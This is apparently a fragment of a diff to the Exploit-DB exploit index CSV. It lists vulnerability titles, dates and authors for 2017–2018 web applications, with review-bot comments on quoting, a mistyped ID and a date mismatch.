42585,exploits/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php,
42588,exploits/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",webapps,hardware,
42589,exploits/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",webapps,php,
42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",webapps,php,
42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php,
42591,exploits/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,webapps,php,
42592,exploits/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",webapps,php,
42595,exploits/php/webapps/42595.txt,"PHP-SecureArea < 2.7 - Multiple Vulnerabilities",2017-08-30,Cryo,webapps,php,
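Review bot: the replacement description for `42590` carries a stray space inside the quotes, `' com_Joomanager'`; the same string appears in the new `44252` row further down in this file, and both should read `'com_Joomanager'` to match the quoting convention of neighbouring rows (e.g. `'IOFireWireFamily'`, `'ptrace/kmod'`).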
@ -38952,4 +38959,6 @@ id,file,description,date,author,type,platform,port
44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,
44219,exploits/hardware/webapps/44219.txt,"D-Link DIR-600M Wireless - Cross-Site Scripting",2018-03-02,"Prasenjit Kanti Paul",webapps,hardware,
44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,
442321,exploits/windows/webapps/442321.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
44241,exploits/windows/webapps/44241.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80
44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,
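Review bot: the rendered view has dropped the `+`/`-` markers, but the header `@ -38952,4 +38959,6 @@` (4 old lines, 6 new) means this hunk removes one line and adds three, consistent with the mistyped `442321` row (path `exploits/windows/webapps/442321.txt`) being replaced by `44241`; that correction is not mentioned in the commit summary, which lists only the Parallels title. Also, the new `44252` row is dated `2017-07-01` whereas the script's banner says `Date: 30 - 06 - 2017`; one of the two should be adjusted.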
